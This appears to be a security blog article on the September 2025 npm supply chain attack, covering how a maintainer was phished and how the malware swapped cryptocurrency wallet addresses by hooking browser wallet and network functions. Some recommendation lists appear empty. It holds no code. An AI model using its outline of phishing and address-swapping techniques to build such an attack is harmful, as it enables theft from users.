Inside the Largest JavaScript Supply Chain Attack in History

uriByuri Security

September 8, 2025 marked a watershed moment in software supply chain security when attackers compromised 18 critical npm packages with over 2 billion weekly downloads through a single phishing email.

The Attack That Shook JavaScript’s Foundation

On the morning of September 8, 2025, the JavaScript ecosystem experienced what security experts are calling the largest npm supply chain attack ever recorded. In what began as a routine Monday morning for open source maintainer Josh Junon (known as “qix”), a sophisticated phishing campaign would ultimately compromise 18 of the most fundamental packages in modern web development.

The attack affected packages with a collective 2 billion weekly downloads on the npm Registry, including foundational libraries like chalk, debug, ansi-styles, and strip-ansi that are deeply embedded in countless JavaScript applications worldwide.

How a Single Email Brought Down JavaScript’s Infrastructure

The Phishing Campaign

The attack began when Junon received what appeared to be a legitimate security notification from “[email protected]” – a domain registered just three days earlier on September 4, 2025, designed to impersonate npm’s official support channels.

The phishing email warned that Junon’s two-factor authentication credentials needed immediate updating before September 10, 2025, or his account would be locked. The message employed classic social engineering tactics: urgency, authority, and fear.

“Sorry everyone, I should have paid more attention,” Junon later acknowledged on Bluesky. “Not like me; have had a stressful week. Will work to get this cleaned up.”

The Technical Exploitation

The malicious link directed victims to a fake npm login page that loaded content from attacker-controlled BunnyCDN buckets. The credential stealer captured usernames, passwords, and live TOTP codes, sending them to websocket-api2.publicvm.com.

The attack was particularly effective because Junon accessed the phishing email on his phone, where the difference between “npmjs.help” and “npmjs.com” was virtually impossible to detect on a small screen.

Inside the Malware: A Cryptocurrency Hunter

Sophisticated Obfuscation

Once the attackers gained control of Junon’s account, they immediately began publishing malicious versions of his maintained packages. The malware employed heavy obfuscation with variables using _0x prefixes and hundreds of obfuscated strings decoded at runtime.

Security researchers quickly identified that the malicious code was specifically designed for browser environments, not server-side Node.js execution.

The Crypto-Stealing Mechanism

The malware’s primary function was cryptocurrency theft through address substitution. It monitored for window.ethereum to detect wallet providers like MetaMask, then installed hooks on request, send, and sendAsync functions.

The attack methodology was sophisticated:

Address Replacement: For each discovered cryptocurrency address, the malware chose the “closest” attacker-controlled address using Levenshtein distance to make the swap less noticeable to users.

Network Interception: The code hooked both fetch() and XMLHttpRequest to rewrite network responses on the fly, modifying JSON and text payloads before applications could process them.

Multi-Chain Support: The malware targeted multiple cryptocurrency networks including Ethereum, Bitcoin, Solana, TRON, Litecoin, and Bitcoin Cash.

The Affected Packages: JavaScript’s Critical Infrastructure

The compromised packages represent some of the most fundamental utilities in the JavaScript ecosystem:

Core packages included: ansi-styles (371M weekly downloads), debug (358M), chalk (300M), supports-color (287M), strip-ansi (261M), wrap-ansi (198M), color-convert (194M), ansi-regex (244M), and many others.

Aikido Security, which first detected the attack, noted that these aren’t obscure utilities – they’re transitive dependencies buried deep in the dependency trees of frameworks and CLI tools used by millions of developers.

Timeline: From Compromise to Containment

13:16 UTC: Malicious versions first published to npm
~15:20 UTC: Community identifies suspicious code and raises alerts on GitHub
Within 2 hours: Maintainers revert to clean versions and unpublish compromised releases
After discovery: npm flags and locks impacted accounts while developers begin auditing dependencies.

According to Vercel’s incident response, the company quickly identified 70 teams with builds containing compromised package versions across 76 unique projects.

The Response: Community Mobilization

Rapid Detection and Warning

The cybersecurity community’s response was swift and coordinated. Aikido Security was among the first to flag the suspicious activity, while Charles Guillemet from Ledger issued early warnings on social media.

Industry Impact Assessment

Major platforms quickly assessed their exposure:

The Surprisingly Small Heist

Despite the massive scale and potential for catastrophic damage, the attackers managed to steal only approximately $50-66 worth of cryptocurrency before the attack was contained.

As security researcher Nicholas Weaver noted, this represents a “missed opportunity” for the attackers, who could have installed backdoors or exfiltrated secrets instead of focusing narrowly on crypto transactions.

The Security Alliance quipped that “the biggest financial impact of this entire incident will be the collective thousands of hours spent by engineering and security teams around the world working to clean compromised environments, and the millions of dollars of sales contracts that will inevitably be signed as a result of this new case study.”

Lessons Learned and Prevention Strategies

The Human Factor

Ensar Seker from SOCRadar noted that this incident “represents a watershed moment in software supply chain security,” highlighting how attackers used a domain that convincingly mimicked a legitimate one to socially engineer the maintainer through “calculated, timed” execution that exploited “developer psychology.”

Technical Safeguards

Security experts recommend several preventive measures:

For Maintainers:

For Organizations:

The Broader Supply Chain Security Context

According to ReversingLabs’ 2025 Software Supply Chain Security Report, 14 of the 23 crypto-related malicious campaigns in 2024 targeted npm, with the remainder linked to PyPI. This attack continues a troubling trend of supply chain compromises targeting the JavaScript ecosystem.

Sonatype’s analysis emphasized that “open source developers are the new frontline of cyberattacks,” with attackers increasingly targeting maintainers as high-value assets who can provide access to millions of downstream users.

Looking Forward: Strengthening the Ecosystem

The September 8th incident serves as a stark reminder of the interconnected nature of modern software development. As one analysis noted: “The path forward requires not just better technology but better processes, stronger community standards, and a recognition that in the modern software ecosystem, security is not a feature but a fundamental requirement.”

The JavaScript community’s rapid response – from detection to remediation within hours – demonstrates the strength of open source collaboration. However, it also highlights the fragility of systems that depend on individual maintainers for critical infrastructure.

As we move forward, the industry must balance the benefits of open source development with the security realities of an increasingly hostile threat landscape. The great npm heist of 2025 may have stolen only $50, but it revealed vulnerabilities worth billions.

For the latest security advisories and indicators of compromise related to this incident, developers should monitor npm’s security announcements and security research from organizations like Socket, Sonatype, and Aikido Security.